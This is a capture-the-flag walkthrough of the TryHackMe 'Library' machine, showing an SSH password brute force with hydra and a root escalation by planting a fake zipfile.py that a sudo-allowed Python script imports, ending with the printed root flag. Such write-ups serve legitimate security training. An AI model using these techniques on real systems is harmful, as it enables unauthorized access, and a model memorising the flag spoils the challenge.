THM: Library
Introduction
boot2root machine for FIT and bsides guatemala CTF
This is Library from THM. Like Dav, this one is ranked easy and doesn’t give any hints as to what it’s about. I’ve been away at the beach for a few days hence no hacking. In fact, these were the first days I’ve not done any at all for probably 6 months.
Ports
HTTP and SSH only, on the standard ports.
HTTP
This is where I spent the vast majority of the time on this box. The landing page was a very basic blog but did include a form supposedly for posting a comment. I tried an escalating series of gobusting searches but found nothing useful.
I ran various fuzzing techniques on the the POST request with Burp Suite. I captured a request and ran it against sqlmap; nothing.
I downloaded a few images and ran some basic stego checks against them; nothing.
Eventually I ran hydra against SSH:
root@kali:/opt/tryhackme/bsidesgtlibrary# hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.75.13
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 03:36:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.75.13:22/
[STATUS] 151.00 tries/min, 151 tries in 00:01h, 14344249 to do in 1583:16h, 16 active
[22][ssh] host: 10.10.75.13 login: meliodas password: iloveyou1Privesc
Presumably this was supposed to be the main challenge of this box, but it’s effectively the same as Wonderland.
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
meliodas@ubuntu:~$ cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile
def zipdir(path, ziph):
for root, dirs, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file))
if __name__ == '__main__':
zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
zipdir('/var/www/html', zipf)
zipf.close()
meliodas@ubuntu:~$So; we have a script which we can run as root that imports both os and zipfile. We can create our own version of zipfile.py, make it executable, and ….
root@ubuntu:~# cat zipfile.py
import os
os.system("/bin/bash")
meliodas@ubuntu:~$ sudo -u root /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# cd /root/
root@ubuntu:/root# ls -lash
total 28K
4.0K drwx------ 3 root root 4.0K Aug 24 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 24 2019 ..
4.0K -rw------- 1 root root 43 Aug 24 2019 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Aug 23 2019 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Aug 23 2019 root.txt
root@ubuntu:/root# cat root.txt
e8c8c6c256c35515d1d344ee0488c617That was that.